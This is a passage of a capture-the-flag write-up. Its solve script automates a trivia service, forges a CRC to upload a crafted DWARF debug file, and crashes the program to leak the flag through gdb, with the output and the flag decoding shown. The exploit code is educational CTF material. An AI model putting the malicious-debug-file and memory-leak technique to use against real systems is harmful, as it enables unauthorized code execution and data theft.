def readquestions():
    data = open('questions.txt', 'rb').read()
    data = data.decode('utf-8').split("\n")
    for x in range(int(len(data)/2)):
        q = data[x*2]
        a = data[x*2+1]
        answers[q] = a

last_score = 0

def question(minscore, fail=False):
    global last_score
    line = r.recvline()
    if line == b'\n':
        return False
    try:
        score = int(line.split(b':')[1].split()[0].decode())
        last_score = score
    except:
        print(line)
        return False
    r.recvuntil(':\n')
    q = r.recvline().decode().strip() # question
    if not fail and q in answers:
        answer = answers[q]
    else:
        answer = 'UNK'
    r.send(answer + '\n')
    r.recvline()
    r.recvline()
    res = r.recvline()
    if b'WRONG' in res and not fail:
        print(f'Wrong answer for "{q}" (sent "{answer}")')
    r.send('\n')
    return score <= minscore or fail

# Init answers and socket
readquestions()
r = remote('exploit-for-dummies.challenges.ooo', 5000)
r.recvuntil('spawn the service up for you.\n')
r.send('\n')
print(r.recvline()) # starting...
print(r.recvline()) # cd
print(r.recvline()) # ./trivia

# Answer correctly to questions
def play(score=5000):
    run = True
    while run:
        run = question(score)

    # Minimum score is reached, abort asap
    run = True
    while run:
        run = question(score, True)

def save_score(name, data):
    r.recvuntil('save your score? (yes/no)\n')
    r.sendline('yes')
    r.sendlineafter('Name:', name)
    if name == 'questions.txt':
        return
    r.recvuntil('Your Name')
    print('CRC:', hex(binascii.crc32(data)), len(data))
    # \n included in data for CRC match
    assert data[-1] == 0x0a
    x = r.send(data)
    print('Sent', x)
    r.sendlineafter('play again? (yes/no)\n', 'yes')

# Now make it segfault and send data
def dump(payload):
    save_score('questions.txt', None)
    r.sendlineafter('continue', '')
    r.sendlineafter('input', '')
    r.sendlineafter('Address', payload)
    r.interactive()

    print(r.recvuntil('x/s ' + payload + '\n'))
    gdb_data = r.recvuntil(payload + ':')
    addr = r.recvline()
    print(gdb_data.decode(), end='')
    print(addr.decode())
    print(r.recvline())


### 
score = play()
print('your score is', last_score)
score = last_score // 0x64
data = open('./trivia.debug', 'rb').read()
data = data + int.to_bytes(score, 1, 'big')
open('./trivia.debug.sent', 'wb').write(data)
__import__('os').system('python3 forcecrc32.py ./trivia.debug.sent 304 3d46c53b') # I'm not proud but that's how I did it
save_score('trivia.debug', open('./trivia.debug.sent', 'rb').read()[:-1])
play(last_score)
dump('0x0+first') # Leak the symbol 'first'

Et voilà! After a while we can see the following:

...
warning: section .bss not found in /home/dummies/tmp/dir_4912804/trivia.debug
[New LWP 37]
Core was generated by `./trivia'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007fc068c97f5b in _IO_new_fclose (fp=0x0) at iofclose.c:48
48    iofclose.c: No such file or directory.
(gdb) 0x7b4f4f4f:    <error: Cannot access memory at address 0x7b4f4f4f>

And as you would have guessed already, 0x7b4f4f4f in little-endian corresponds to the characters OOO{ which is the mark of the beginning of the flag. All I had to do now was to adjust the shellcode to read the bytes 4 by 4 until the full flag is leaked:

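import struct

p32 = lambda x: struct.pack('<I', x)
flag = b'OOO{' + p32(0x72617764) + p32(0x68732066) + p32(0x636c6c65) + p32(0x7365646f) + p32(0x65726120) + p32(0x72657620) + p32(0x656c2079) + p32(0x7d7465)
# The last chunk is only 3 bytes long, so drop its zero padding before printing
print(flag.rstrip(b'\x00').decode())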

OOO{dwarf shellcodes are very leet}

Conclusion

I found this challenge very interesting as I learned a lot about the capabilities of DWARF. It still amazes me how complex this language is and all the things one can do with it.

I'd like to thank yrp, grimmlin, burrito and clz for their help during this challenge and the time they spent helping a dummy.